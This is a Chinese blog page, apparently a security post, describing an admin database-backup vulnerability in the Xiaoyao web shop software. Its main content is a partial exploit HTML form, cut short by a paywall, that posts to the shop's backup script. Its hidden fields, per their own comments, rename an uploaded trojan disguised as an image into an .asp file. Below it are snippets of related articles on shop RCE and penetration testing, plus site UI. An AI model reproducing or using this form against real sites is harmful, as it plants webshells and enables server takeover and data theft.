逍遥网店所有版本后台数据备份漏洞

最新推荐文章于 2024-11-28 20:26:19 发布
原创 最新推荐文章于 2024-11-28 20:26:19 发布 · 2.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据备份 #数据库 #input #button #stylesheet #javascript

该博客揭示了逍遥网店存在一个数据备份漏洞,通过特定的JavaScript代码,攻击者可以执行数据库备份、压缩、恢复、删除和下载等操作。用户在确认警告消息后,可以执行这些敏感操作,这可能对服务器稳定性和数据安全性构成威胁。
程序代码
<script language=javascript src=http://www.99**.com/include/mouse_on_title.js></script>

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="manage.css" type="text/css">
</head>
<BODY background="../images/admin/back.gif">

<table width="98%" border="1" style="border-collapse: collapse; border-style: dotted; border-width: 0px"
bordercolor="#333333" cellspacing="0" cellpadding="2">
<form action=http://www.99**.com/admin/safe5.asp method=post name=backup>
<tr class=backs><td colspan=2 class=td height=18>数据库在线维护</td></tr>
<input type="hidden" name="oldpath" value="../pic/digi/0063.jpg"><!--木马改图片上传后的路径-->
<input type="hidden" name="DBname" size="20" value="xuehan.asp"><!--要备份的木马路径-->
<tr><td colspan=2 heigh=50
最低0.47元/天 解锁文章
商城系统 RCE漏洞复现
0xSec
12-11 1767
商城系统的api/testOrderSubmit模块下的preview方法存在命令执行漏洞,攻击者可以向服务器写入木马文件,直接获取服务器权限
漏洞挖掘|电子商城漏洞挖掘案例灵感复现
Lucker_YYY的博客
10-10 1336
当时该API还泄露了商家的身份证号的,我一激动直接去找平台客服了,然后当时他们就修了,后面漏洞就不认了,说是正常功能,泄露信息大概在几十万左右,泄露信息:个人姓名,身份证号,手机号,小区住址,邮箱等信息。这个是之前遇到的一个商城小程序漏洞,出现的支付漏洞,除了支付功能及接口在WEB站点没有,其它功能一样,除此之外,不同的是,小程序所有请求/响应包内容都被base64编码了。一般情况下小程序是我们在挖掘企业漏洞时,在搜集资产的一部分,很少有专门去挖掘小程序漏洞的,因为小程序漏洞并不是很多,普遍的如下。
逍遥网站整站系统后门扫描器
11-22
逍遥网站整站系统后门扫描器逍遥网站整站系统后门扫描器逍遥网站整站系统后门扫描器逍遥网站整站系统后门扫描器逍遥网站整站系统后门扫描器逍遥网站整站系统后门扫描器
漏洞挖掘某电子商城漏洞挖掘案例教程,手把手教你复现一个完整的漏洞挖掘全流程
最新发布
A1353192296的博客
11-28 1414
最近确实比较忙,各位见谅关于电子商城类的漏洞,在漏洞挖掘时主要侧重如下方面对于代码审计-白盒白盒审计还是侧重owasp类型的漏洞,传统8大漏洞+API测试等,这个不用多说侧重说黑盒测试首先,我们知道它是商城系统,肯定以支付和商品为主所以在挖掘时,先去看有无支付漏洞、关于支付漏洞大家可以去多看文章其次就是有商品肯定有商家,关注是否存在商家信息泄露、越权的情况有商家肯定有商家系统后台,搜集信息能否进入商家系统后台或系统存在的漏洞
模拟实战从外网打点渗透到内网域控的笔记
qq_56426046的博客
12-11 1668
在docker如果启动的时候 --privileged=true 是 可以逃逸的。这次模拟实战的项目几乎是第一次做这么完整的项目从外网渗透到内网域控,这次渗透过程中学到了很多东西,但很多也是我应该熟练使用的。然后通过任意文件写入getshell,因为重装信息会写到config.php,也就 给了我写马的机会.工具地址:https://github.com/Ridter/noPac。设置 kali 的 /etc/proxychains4.conf 文件。利用任意文件删除漏洞删除install.lock文件。
逍遥商城系统 v2.2 免费版(无功能限制)
06-12
逍遥网络商城建站程序》是一套傻瓜式的建站程序,只要您稍有电脑操作和网络应用知识,即可快速打造出属于您自己的购物网站。 本系统由前台购物、后台管理、在线支付三部分组成,功能强大、使用简单、管理方便,只要会打字就会维护网站。 本系统没有花里胡哨的界面,以简洁、实用为本,堪称为中小企业和个人量身订做的一套完美商城系统。 1.注册与否均可购物(同类程序大多要求注册才能购物),方便了那些懒得注册的客户。降低用户使用门槛,自然可抓住更多潜在商机。 2.会员等级和折扣功能。管理员可方便的为会员设置不同等级,不同等级的员会可享受不同的购物折扣。 3.站内短信、留言发布,沟通无极限。会员和游客均可发送短信和留言。 4.完美融合在线支付功能,无需编程、无需修改源文件,三分钟设置即可让网站拥有在线支付功能。让用户付款方便,自然能收获更多用户、更多业绩。 5.支持商品略图、全图、大图、多图,非常适合从多角度拍摄商品图片,对商品进行全方位的展示。 6.支持市场价与热卖价,通过对比可吸引顾客购买欲望。最终售价名称可自定义,例如您可将“热卖价”的名称换为“心动价”、“逍遥价”、“结缘价”等个性化的名称。 7.实用的滚动广告、双字幕广告、横幅图片广告、飘浮广告,多方位向顾客传递网站资讯。 8.强大的新闻文章发布功能,具有新闻分类、新闻固顶等实用功能。 9.方便实用的友情链接,是网站推广的好工具。 10.支持多管理员,可以为不同的管理员设置不同的权限。 11.功能强大、使用简单的后台管理,维护网站就像做填空题一样简单;
Discuz! 后台数据库备份功能命令执行漏洞
weixin_34402408的博客
10-11 754
简介:2018年8月27号,有安全研究人员在GitHub上公布了有关Discuz!多个版本后台数据库备份功能存在的命令执行漏洞的细节。修复方案:目前官方对于老版本Discuz不再更新,如需要手动修复此漏洞,较可靠的做法是将Discuz升级到Discuz3.4或以上版本。【注意:该补丁为云盾自研代码修复方案,云盾会根据您当前代码是否符合云盾自研的修复模式进行检测,如果您自行采...
逍遥B2C商城系统
字节网盘SEO工具
05-25 1515
介绍: 一款基于开源框架开发的商城系统,支持PC+H5,系统功能完整,无漏洞,无加密,无功能缺失,任何人都可使用本系统,系统会持续更新。 网盘下载地址: http://kekewl.org/7GL5J1fpqbp0 图片: ...
逍遥西游-繁华后台_后台_逍遥_繁华_繁华后台修改_逍遥西游后台_源码.zip
09-30
逍遥西游-繁华后台》是一款基于网络游戏《逍遥西游》的后台管理系统,其核心功能是为游戏运营提供数据支持和服务。源码的发布对于开发者和研究者来说是一份宝贵的资源,可以深入理解游戏后台的架构和逻辑。下面将...
逍遥B2C商城源码带PC端修复版和H5由PHP+MySQL开发
04-09
逍遥B2C商城源码带PC端和H5是一个以PHP MySQL进行开发的php商城网站源码。解决虚拟商品自动发货时出现的多个卡密BUG 2.解决由于支付方式切换带来的余额不扣除BUG 逍遥B2C商城源码(PC H5)技术参数 1、支持伪静态 2、支持对php7的支持 3、支持百万级数据库压力测试 4、经过多重安全漏洞检测 5、Win或linux都可以安装
基于PHP的最新逍遥B2C商城(PC+H5)v1.1.3源码.zip
01-25
基于PHP的最新逍遥B2C商城(PC+H5)v1.1.3源码.zip
逍遥商城系统V1.13版免授权商业版
07-03
测试环境:虚拟主机 php5.6以上 现在我们来打开面板 1.创建网站,上传源码至网站根目录,解压、 解压完成后直接打开域名进行安装 现在是未安装的状态,我们输入后缀去安装 2.安装地址:域名/install/index.php 数据库信息和账号密码,自己去输入就可以, 接下来安装安装步骤来就OK 我们先打开前台看看,页面和某宝,某站相似!!! 我们现在打开后台看看后台地址:域名+/admin/webadmin.php,功能还是挺多的 功能还是挺全面的,大家就自己去探讨了,以上就是今天的搭建教程, 功能都是完美的,源码已经完美修复整理过的。本源码免授权商业版 后台的信息什么的,自己就可以在后台根据需要更改,没什么难的东西
精选资源
逍遥西游-繁华后台_后台_逍遥_繁华_繁华后台修改_逍遥西游后台.zip
10-10
很抱歉,但根据您给出的信息,这似乎是一个与游戏《逍遥西游》相关的后台系统或修改工具的压缩包文件。由于没有具体的标签和详细的文件名列表,无法提供深入的IT知识点。不过,我们可以从游戏开发和后台管理的角度来...
精选资源
逍遥2.55 好用的数据分析软件
07-20
逍遥2.55是一款高效且用户友好的数据分析软件,它专为那些需要处理大量数据、进行深度分析的用户设计。这款软件集成了多种强大的统计工具和可视化功能,使得数据分析过程更为简便快捷。以下是对这款软件及其特点的...
逍遥模拟器上传服务器文件,逍遥模拟器后台操作
weixin_39974882的博客
08-04 526
.版本 2.DLL命令 API_寻找顶级窗口, 整数型, "user32", "FindWindowA", , 寻找窗口列表中第一个符合指定条件的顶级窗口(在vb里使用:FindWindow最常见的一个用途是获得ThunderRTMain类的隐藏窗口的句柄;该类是所有运行中vb执行程序的一部分。获得句柄后,可用api函数GetWindowText取得这个窗口的名称;该名也是应用程序的标题)找到...
逍遥B2C商城源码(PC H5)v1.1.3
SEO资源下载
03-06 1606
介绍: 逍遥B2C商城源码(PC+H5)是一个以PHP+MySQL进行开发的php商城网源码。 逍遥B2C商城源码(PC+H5)v1.1.3 更新日志1.解决虚拟商品自动发货时出现的多个卡密BUG 2.解决由于支付方式切换带来的余额不扣除BUG 逍遥B2C商城源码(PC+H5)功能1、支持PC+H5版本(H5版本可以对接公众号进行二次开发) 2、支持虚拟商品自动发货 3、支持自定义多种规格参数商品管理 4、支持拼团活动,自定义商品团购活动,线上营销活动更丰富。 5、支持限时折扣,自定义折扣比例,多种营销活动
评论 4
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值